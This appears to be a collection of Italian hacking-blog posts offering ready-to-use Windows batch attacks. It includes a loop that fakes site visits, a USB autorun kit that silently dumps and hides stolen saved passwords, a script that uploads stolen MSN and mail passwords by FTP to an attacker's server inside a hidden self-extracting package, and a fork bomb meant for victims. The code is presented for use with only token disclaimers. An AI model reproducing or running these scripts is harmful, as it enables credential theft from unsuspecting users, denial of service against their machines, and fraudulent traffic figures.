Come aumentare il conta-visite del tuo sito

Quasi tutti i siti dispongono di un contatore di visite, un’esempio è quello del mio blog che vedete qui a destra nella sidebar.

Ogni volta che un utente visita un sito la conta incrementa di uno… meccanismo semplice no?!

Forse qualcuno di voi avrà provato ad aggiornare il browser per vedere se la conta incrementa, beh non sempre funziona: in siti “semplici” nei quali la conta è una semplice variabile che incrementa all’apertura della pagina và, ma in siti “complessi” la conta tiene conto (scusate il giro di parole XD) del pc che ha effettuato l’accesso, quindi la prima volta è ok ma la seconda “sà” che il pc c’è già stato…

Quello che oggi vi mostro è un piccolo script in linguaggio Batch che serve ad ovviare il secondo caso: create un nuovo file di testo, incollateci questo testo:

@echo off
:1
start start "C:\Program Files\Internet Explorer\iexplore.exe" "https://hackingmatt.wordpress.com/"
ping -n 10 127.0.0.1 >nul
taskkill /f /IM iexplore.exe
goto 1

e salvatelo come nome-che-volete.bat

Note:

  1. dopo la stringa start “c:\….” il sito (tra virgolette) và nella stessa riga della stessa, non a capo come qui sopra (per colpa della larghezza di questa pagina).
  2. al posto di “10” nel ping potete mettere un numero maggiore o minore a seconda della vostra velocità di banda (> il numero per tempi di caricamento lenti…) dall’8 al 12 circa per i 2 Mega, minore per più veloci. Con 10 secondi avrete 360 visite in un ora, con 5 ne avrete 720.
  3. dovete dedicare un browser a ciò, nell’esempio IE explorer.
  4. si apriranno tante finestre…ignoratele e di quanto in quanto (circa 200 finestre) chiudetele e riaprite il bat. ciò serve per evitare che la ram si riempi troppo e si pianti il pc… potete anche non farlo se il vostro pc è “potente”.

Usatelo come volete ma sappiate che poi non saete in grado di sapere i reali visitatori del vostro sito (o degli altri)… io non ne faccio uso per questo motivo…(si come no, direte…è vero!!! poi non sò i visitatori reali! che me ne frega di inventarmi le visite…..eh!)

Facile no?

Annunci

Rubare tutte le password di un computer con una chiavetta USB

image

( la foto non centra molto ma era simpatica….XD )

Il sito web Nirsoft fornisce diversi programmi gratuiti per recuperare le password salvate nel computer che si sta usando nel caso in cui le si dimenticano. E’ possibile però usare questi programmi gratuiti per altri scopi, come rubare le password del computer che si sta utilizzando.

Se un malintenzionato ha accesso fisico al computer da cui rubare le password, ha a disposizione solo pochi secondi per compiere l’”operazione”. Da questa necessità, ecco l’idea di usare una chiavetta USB. Con questo articolo, voglio semplicemente farvi vedere come sia facile creare una chiavetta USB che, inserita nel computer che ci interessa, salva le password trovate all’interno della chiavetta stessa.

Così facendo, basta collegare la chiavetta al computer che ci interessa, fare un semplice click e dopo qualche secondo staccare la chiavetta ed allontanarci dal computer con le password. Per realizzare questa chiavetta USB speciale, prima di tutto, create una cartella sul vostro desktop con il nome di Chiavetta. Questa cartella conterrà tutti i file che andranno copiati nella chiavetta.

Collegatevi alla pagina del sito web di Nirsoft per scaricare i programmi per recuperare le password. Vi consiglio di scaricare solo i programmi che vi recuperano le password che vi interessano. Se avete intenzione, ad esempio, di recuperare solo le password dei programmi di chat e quelli delle e-mail, scaricate i programmi MessenPass e Mail PassView.

Dopo aver scaricato i pacchetti con i programmi per recuperare le password, estraeteli nella cartella Chiavetta. In questa cartella lasciate solo i programmi veri e propri: cancellate, in breve, gli altri file come il readme.txt o la guida di utilizzo del programma.

A questo punto, scaricate ed installate l’ultima versione di Winrar. Andate su questa pagina e scaricate WinRAR. Dopo aver installato Winrar, andate su C:/Programmi/WinRAR, copiate ed incollate il programma Rar.exe nella cartella del desktop Chiavetta.

Adesso aprite il Blocco Note, e scrivete la seguente riga per ogni programma che recupera le password che avete inserito nella cartella Chiavetta:

@nomedelprogramma.exe /sverhtml nomedelprogramma.html

Al termine del file scrivete, invece, le righe:

REM Scrittura del file di log
@echo COMPUTERNAME = %COMPUTERNAME% > log.txt
@echo USERNAME = %USERNAME% >> log.txt
@echo USERDOMAIN = %USERDOMAIN% >> log.txt
@echo USERPROFILE = %USERPROFILE% >> log.txt
@echo. >> log.txt
@echo Oggi e’ %DATE% e sono le %TIME% >> log.txt

REM Compressione
@rar.exe a -pPASSWORD backup_%random%.rar *.html log.txt > nul

REM Eliminazione e celamento dei file usati
@del *.html
@del log.txt
@attrib +h *.exe
@attrib +h autorun.inf

In breve, quando avvierete questo piccolo programmino, le password verranno recuperate dal computer e salvate in diversi file .HTML. A questo punto, questi file HTML vengono inseriti in un archivio .RAR protetto da password. La password dell’archivio deve essere specificata al posto della parola PASSWORD.

La password è case sensitive: fanno differenza, quindi, le lettere maiuscole e quelle minuscole. Alla fine i programmi utilizzati per recuperare le password vengono nascosti e le pagine HTML eliminate, poichè già inserite nell’archivio .RAR. Nel mio caso (programmi MessenPass e Mail PassView), ho scritto queste righe:

@mspass.exe /sverhtml mspass.html
@mailpv.exe /sverhtml mailpv.html

REM Scrittura del file di log
@echo COMPUTERNAME = %COMPUTERNAME% > log.txt
@echo USERNAME = %USERNAME% >> log.txt
@echo USERDOMAIN = %USERDOMAIN% >> log.txt
@echo USERPROFILE = %USERPROFILE% >> log.txt
@echo. >> log.txt
@echo Oggi e’ %DATE% e sono le %TIME% >> log.txt

REM Compressione
@rar.exe a -pPASSWORD backup_%random%.rar *.html log.txt > nul

REM Eliminazione e celamento dei file usati
@del *.html
@del log.txt
@attrib +h *.exe
@attrib +h autorun.inf

Alla fine, salvate il file con il nome lancia.bat: andate semplicemente su File/Salva file con nome… e, nella finestra che si apre, scrivete lancia.bat in Nome file. Il file deve essere salvato nella Chiavetta.

Dopo aver creato il file lancia.bat, create il file autorun.inf sempre con il Blocco note:

[autorun]
open=lancia.bat
action=Preleva password

A questo punto avete finito. Nella cartella troverete i seguenti file:

Contenuto chiavetta

Dovete semplicemente copiare tutti i file nella cartella principale della vostra chiavetta USB per concludere la sua creazione. Se volete fare delle prove, dopo aver copiato i file, estraete ed inserite la chiavetta. Verrà aperta la seguente finestra:

Chiavetta USB

Se selezionate la prima voce (Preleva password) e fate click sul tasto OK, le password del computer verranno salvate all’interno dell’archivio protetto .RAR. A questo punto, basta staccare la chiavetta ed andare in un computer sicuro con Winrar installato per leggere le password trovate.

L’articolo è puramente a scopo di studio e l’autore non si ritiene responsabile per eventuali usi impropri. Rubare password che non siano le proprie è illegale.

Fonte: blog di aranzulla

Foto di GlamGal su flickr.com

Come rubare password di MSN e di una casella mail da remoto usando MessenPass e MailPassView

In questo primo post vi spiego come usare i programmini “MessenPass” e “MailPassView“, quelli usati in quel famoso metodo per rubare le password via penna USB.

Bene per chi non lo sapesse questi due programmini servono per recuperare le password dimenticate di Msn o di account mail memorizzate su una macchina.

Adesso vi dimostro come è possibile utilizzarli per rubare le password salvate senza avere accesso fisico alla macchina.

Il pirata informatico si serve di: uno spazio web, il programma “MessenPass”, “MailPassView”,(vedi qui su come usare anche altri programmi, stà tutto nel mettere l’eseguibile con “/sverhtml “nel batch) il file eseguibile di WinRar(installatelo e prelevate da c:/programmi/winrar/rar.exe), un editor di testo qualsiasi per scrivere il file start.bat e il file ftp.txt.

Per uno spazio web è necessario uno con accesso ftp (es.netsons.org) in cui registrarsi e abilitare l’ftp se necesario. Potete usare FileZilla per la gestione ftp.

Il codice del file start.bat:

@echo off
messenpass.exe /sverhtml Password-MSN.html //scrive l’output di messenpass in un file html
mailpassview.exe /sverhtml Password-Outlock.html //scrive l’output di mailpasspreview in un file html
rar.exe a archvio.rar *.html //comprime i due file html contenenti le password in una archivio
md c:\temp //crea la cartella temporanea
copy ftp.txt C:\temp //copia il file ftp.txt nella catella temporanea
copy *.rar c:\temp //copia il file rar nella cartella temporanea
cd c:\temp //si posiziona nella cartella temporanea
ftp -v -i -s:ftp.txt //avvia la sessione ftp con lo spazio web e permette di eseguire i comandi contenuti nel file di testo
del ftp.txt //elimina il file ftp che contiene i dati di accesso e i comandi dalla cartella temporanea
del *.rar //emilina i file rar nella cartella temporanea

Il contenuto del file ftp.txt:

open tuositoftp.org //l'host dello spazio web
tuouserftp //l’username dello spazio web
tuapasswordftp //la password dello spazio web
cd msn //cartella che conterrà i log
lcd c:\temp //si posiziona nella cartella locale temporanea
BINARY //imposta il trasferimento di file di tipo binario
mput *.rar //trasferisce i file rar allo spazio web
bye
//chiude la sessione ftp

Il pirata tramite ftp crea una cartella chiamata “msn” dove riceverà il file compresso che contiene le password, successivamente invierà alla sua vittima tutti questi programmi compressi con iexpress.

Iexpress è un software di casa Microsoft, potete usarlo seguendo il procedimento: start->esegui->digitare “iexpress”(senza virgolette)->PREMERE INVIO.

Ovviamente ho scritto il codice con degli errori in modo tale da non poter essere usato con iexpress, questo evita l’uso spropositato ai lamer di turno.

Iexpress permette di autoestrarre dei file in modalità nascosta “hidden” quindi la vittima quando apre il file non si accorge di niente,nessuna finestra, nessun errore, non da segno di vita alcuna, la vittima è convinta che il file non funziona.

Il pirata non invierebbe mai i file senza averli prima compressi e nascosti, perchè il file ftp.txt contiene i dati di login al suo spazio web.

Due consigli:

non memorizzate le password sul vostro computer ma riscrivetele ogni volta;

se siete troppo pigri e non volete rinunciare alla comodità della password salvata vi consiglio di non aprire file eseguibili ricevuti via email o via Messenger che non siano di fonte certa, poichè potrebbero contenere questi file maligni! D

Abbastanza facile no?

Foto di neingeist su flickr.com

Fonte underground0

Bloccare un pc in modo semplicissimo

Un metodo rapido per bloccare il pc proprio o di una vittima con un finto virus:

Aprite Blocco Note e scrivete:

@echo off

start ugo.bat

ugo.bat

Salvate come ugo.bat (con l’estensione .bat) e ora basta aprirlo e il pc si bloccherà in un attimo…

Il funzionamento è semplicissimo: è uno script in batch che apre se tesso infinite volte senza la possibilità di bloccarlo.

Potete provarlo sul vostro pc, tranquilli che non fà alcun danno, l’unica cosa è che vi si pianta il pc e dovete premere reset per riavviarlo. Quindi salvate ciò che stavate facendo!!

AH..dimenticavo..potete passare il file ugo.bat a chi volete…(se lo rinominate dovete però modificarlo con blocco note e sostituire "start ugo.bat" con "start nome.bat" e di nuovo sotto "ugo.bat" in "nome.bat" altrimenti non funziona…)

Alla prossima!!!